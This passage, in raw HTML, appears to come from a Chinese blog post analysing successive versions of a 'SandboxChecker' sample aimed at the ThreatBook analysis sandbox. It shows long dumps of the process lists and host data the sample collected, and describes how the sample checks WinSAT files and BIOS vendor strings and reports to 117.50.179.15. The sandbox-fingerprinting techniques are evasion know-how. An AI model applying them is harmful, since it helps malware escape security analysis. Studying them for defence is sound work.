class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1648</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1696</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1708</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1720</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1812</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1824</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1900</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1932</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">spoolsv.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1116</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">audiodg.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">720</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1512</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2052</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2132</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2180</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2536</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2544</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2552</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2560</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">AcrylicService.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2568</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2576</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2584</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2628</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2804</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3056</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">752</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">sppsvc.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2508</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SppExtComObj.Exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">760</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3084</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3196</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3328</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">sihost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3572</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3596</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3772</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ctfmon.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3860</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">taskhostw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3900</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">explorer.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3188</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3692</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3724</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ChsIME.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3648</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4212</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">StartMenuExperienceHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4220</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4256</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RuntimeBroker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4416</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ApplicationFrameHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4716</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MicrosoftEdge.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4736</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">browser_broker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4844</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4944</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">dllhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5020</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">Windows.WARP.JITService.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5028</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RuntimeBroker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3804</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MicrosoftEdgeCP.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4352</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MicrosoftEdgeSH.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4496</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5284</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WeChat.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5544</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">taskhostw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5932</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6068</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">TrustedInstaller.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6132</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3468</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">usocoreworker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5564</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">TiWorker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5732</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5492</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">668</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WmiPrvSE.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4796</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WmiPrvSE.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3916</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4952</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6028</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WeChat.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6092</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">PWTXIkBXCb.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2432</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">unsecapp.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3608</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ShellExperienceHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2204</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4004</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">persfw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3212</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2636</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">QQ.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3524</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SafeDogGuardCenter.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5984</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">sihost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1848</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">backgroundTaskHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2824</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">Detonate.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5812</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">BgackgroundTransferHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5040</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RemindersServer.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3884</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">vba32lder.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5612</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">wrctrl.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1336</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">safedog.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6032</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SafeDogSiteIIS.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5652</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SafeDogServerUI.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1948</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">GoogleUpdate.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5856</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">audiodg.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4312</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">taskhostw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2640</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WUDFHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1524</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SafeDogGuardCenter.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5188</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WmiPrvSE.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6064</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">GoogleUpdateSetup.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6004</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SafeDogTray.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2652</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">safedogupdatecenter.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4988</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1924</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ShellExperienceHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">672</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RuntimeBroker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6184</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6996</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SandboxCheck.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6352</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">conhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6312</span><br><br></code></pre></td></tr></table></figure>\n\n<blockquote>\n<p>以下内容为奇思妙想内容</p>\n</blockquote>\n<p>WinSAT的信息似乎不会改变,是不是可以通过比对哈希来查看是否为微步虚拟机呢?</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405164335823.png\"></p>\n<h2 id=\"SandboxChecker-V1-2-1\"><a href=\"#SandboxChecker-V1-2-1\" class=\"headerlink\" title=\"SandboxChecker V1.2.1\"></a>SandboxChecker V1.2.1</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405170635549.png\"></p>\n<p>间隔20分钟的程序,只是多了个打开计算器<code>ShellExecuteW(0i64, L&quot;open&quot;, L&quot;calc.exe&quot;, 0i64, 0i64, 1);</code></p>\n<p>查询作者精神状态,,,,</p>\n<h2 id=\"SandboxChecker-V1-3-0\"><a href=\"#SandboxChecker-V1-3-0\" class=\"headerlink\" title=\"SandboxChecker V1.3.0\"></a>SandboxChecker V1.3.0</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405164952900.png\"></p>\n<p>在历时一天后,作者似乎发现了新的大陆.但是为什么要切换到VS2008啊 我不能理解(</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405165228725.png\"></p>\n<p>对的 作者开始察觉<code>C:\\Windows\\Performance\\WinSAT\\DataStore\\</code>隐藏着秘密,所以专门写了一个测试文件去检查目标文件是否存在并且回传到<code>117.50.179.15:4448</code></p>\n<h2 id=\"SandboxChecker-V1-3-1\"><a href=\"#SandboxChecker-V1-3-1\" class=\"headerlink\" title=\"SandboxChecker V1.3.1\"></a>SandboxChecker V1.3.1</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405165755925.png\"></p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405165954211.png\"></p>\n<p>变化不大,简单的水一下过去了.</p>\n<h2 id=\"SandboxChecker-V1-3-2\"><a href=\"#SandboxChecker-V1-3-2\" class=\"headerlink\" title=\"SandboxChecker V1.3.2\"></a>SandboxChecker V1.3.2</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405171157630.png\"></p>\n<p>VS版本切换到了2015 看起来还在Debug程序的上传功能?</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405171119743.png\"></p>\n<p>回传变更成了<code>117.50.179.15:4447</code></p>\n<h2 id=\"SandboxChecker-V1-3-3\"><a href=\"#SandboxChecker-V1-3-3\" class=\"headerlink\" title=\"SandboxChecker V1.3.3\"></a>SandboxChecker V1.3.3</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405171333235.png\"></p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405171442329.png\"></p>\n<p>回传变更成了<code>117.50.179.15:4446</code></p>\n<h2 id=\"SandboxChecker-V1-4-0\"><a href=\"#SandboxChecker-V1-4-0\" class=\"headerlink\" title=\"SandboxChecker V1.4.0\"></a>SandboxChecker V1.4.0</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405173701737.png\"></p>\n<p>1.4.0版本开始进军全新版本了</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405174029664.png\"></p>\n<p>开始搜寻是否存在<code>Formal.Assessment (Initial).WinS</code>的文件与此文件中是否包含 <code>American Megatrends Inc.</code></p>\n<p>如果存在则弹窗提示American Megatrends Inc.如果没有则打开计算器.</p>\n<h2 id=\"SandboxChecker-V1-5-0-4月7日追踪更新版\"><a href=\"#SandboxChecker-V1-5-0-4月7日追踪更新版\" class=\"headerlink\" title=\"SandboxChecker V1.5.0   4月7日追踪更新版\"></a>SandboxChecker V1.5.0   4月7日追踪更新版</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240407131236283.png\"></p>\n<p>凌晨两点,这小哥真的不睡觉的吗 功能变化不大,似乎与V1.2.0版本差不多,除了新增一个打开计算器</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240407131407965.png\"></p>\n<p>信息发送至<code>117.50.179.15:8086</code></p>\n<figure class=\"highlight yaml\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br><span class=\"line\">27</span><br><span class=\"line\">28</span><br><span class=\"line\">29</span><br><span class=\"line\">30</span><br><span class=\"line\">31</span><br><span class=\"line\">32</span><br><span class=\"line\">33</span><br><span class=\"line\">34</span><br><span class=\"line\">35</span><br><span class=\"line\">36</span><br><span class=\"line\">37</span><br><span class=\"line\">38</span><br><span class=\"line\">39</span><br><span class=\"line\">40</span><br><span class=\"line\">41</span><br><span class=\"line\">42</span><br><span class=\"line\">43</span><br><span class=\"line\">44</span><br><span class=\"line\">45</span><br><span class=\"line\">46</span><br><span class=\"line\">47</span><br><span class=\"line\">48</span><br><span class=\"line\">49</span><br><span class=\"line\">50</span><br><span class=\"line\">51</span><br><span class=\"line\">52</span><br><span class=\"line\">53</span><br><span class=\"line\">54</span><br><span class=\"line\">55</span><br><span class=\"line\">56</span><br><span class=\"line\">57</span><br><span class=\"line\">58</span><br><span class=\"line\">59</span><br><span class=\"line\">60</span><br><span class=\"line\">61</span><br><span class=\"line\">62</span><br><span class=\"line\">63</span><br><span class=\"line\">64</span><br><span class=\"line\">65</span><br><span class=\"line\">66</span><br><span class=\"line\">67</span><br><span class=\"line\">68</span><br><span class=\"line\">69</span><br><span class=\"line\">70</span><br><span class=\"line\">71</span><br><span class=\"line\">72</span><br><span class=\"line\">73</span><br><span class=\"line\">74</span><br><span class=\"line\">75</span><br><span class=\"line\">76</span><br><span class=\"line\">77</span><br><span class=\"line\">78</span><br><span class=\"line\">79</span><br><span class=\"line\">80</span><br><span class=\"line\">81</span><br><span class=\"line\">82</span><br><span class=\"line\">83</span><br><span class=\"line\">84</span><br><span class=\"line\">85</span><br><span class=\"line\">86</span><br><span class=\"line\">87</span><br><span class=\"line\">88</span><br><span class=\"line\">89</span><br><span class=\"line\">90</span><br><span class=\"line\">91</span><br><span class=\"line\">92</span><br><span class=\"line\">93</span><br><span class=\"line\">94</span><br><span class=\"line\">95</span><br><span class=\"line\">96</span><br><span class=\"line\">97</span><br><span class=\"line\">98</span><br><span class=\"line\">99</span><br><span class=\"line\">100</span><br><span class=\"line\">101</span><br><span class=\"line\">102</span><br><span class=\"line\">103</span><br><span class=\"line\">104</span><br><span class=\"line\">105</span><br><span class=\"line\">106</span><br><span class=\"line\">107</span><br><span class=\"line\">108</span><br><span class=\"line\">109</span><br><span class=\"line\">110</span><br><span class=\"line\">111</span><br><span class=\"line\">112</span><br><span class=\"line\">113</span><br><span class=\"line\">114</span><br><span class=\"line\">115</span><br><span class=\"line\">116</span><br><span class=\"line\">117</span><br><span class=\"line\">118</span><br><span class=\"line\">119</span><br><span class=\"line\">120</span><br><span class=\"line\">121</span><br><span class=\"line\">122</span><br><span class=\"line\">123</span><br><span class=\"line\">124</span><br><span class=\"line\">125</span><br><span class=\"line\">126</span><br><span class=\"line\">127</span><br><span class=\"line\">128</span><br><span class=\"line\">129</span><br><span class=\"line\">130</span><br><span class=\"line\">131</span><br><span class=\"line\">132</span><br><span class=\"line\">133</span><br><span class=\"line\">134</span><br><span class=\"line\">135</span><br><span class=\"line\">136</span><br><span class=\"line\">137</span><br><span class=\"line\">138</span><br><span class=\"line\">139</span><br><span class=\"line\">140</span><br><span class=\"line\">141</span><br><span class=\"line\">142</span><br><span class=\"line\">143</span><br><span class=\"line\">144</span><br><span class=\"line\">145</span><br><span class=\"line\">146</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs yaml\"><span class=\"hljs-string\">systemInfo=Computer</span> <span class=\"hljs-attr\">Name:</span> <span class=\"hljs-string\">DESKTOP-H9URB7T,</span> <span class=\"hljs-attr\">CPU Cores:</span> <span class=\"hljs-number\">4</span><span class=\"hljs-string\">,</span> <span class=\"hljs-attr\">Hard Drives:</span> <span class=\"hljs-number\">2</span><br><span class=\"hljs-attr\">Directory Contents:</span> <br><span class=\"hljs-string\">desktop.ini</span><br><span class=\"hljs-string\">Microsoft</span> <span class=\"hljs-string\">Edge.lnk</span><br><br><span class=\"hljs-attr\">WinSAT:</span> <br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.25</span><span class=\"hljs-number\">.993</span><span class=\"hljs-string\">.winsat.etl</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Cpu.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Disk.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">DWM.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Graphics3D.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Mem.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.08</span><span class=\"hljs-number\">.10</span><span class=\"hljs-number\">.544</span> <span class=\"hljs-string\">Formal.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><br><span class=\"hljs-string\">网卡信息:</span><br><span class=\"hljs-string\">Realtek</span> <span class=\"hljs-string\">RTL8139C+</span> <span class=\"hljs-string\">Fast</span> <span class=\"hljs-string\">Ethernet</span> <span class=\"hljs-string\">NIC</span><br><br><span class=\"hljs-string\">开启窗口数量:</span><br><span class=\"hljs-number\">6</span><br><span class=\"hljs-attr\">Process Name:</span> [<span class=\"hljs-string\">System</span> <span class=\"hljs-string\">Process</span>]<span class=\"hljs-string\">,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">0</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">System,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">Registry,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">96</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">smss.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">324</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">csrss.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">444</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">wininit.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">520</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">csrss.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">568</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">winlogon.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">620</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">services.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">660</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">lsass.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">684</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">796</span><br><span class=\"hljs-attr\">Process Name:</span> <span 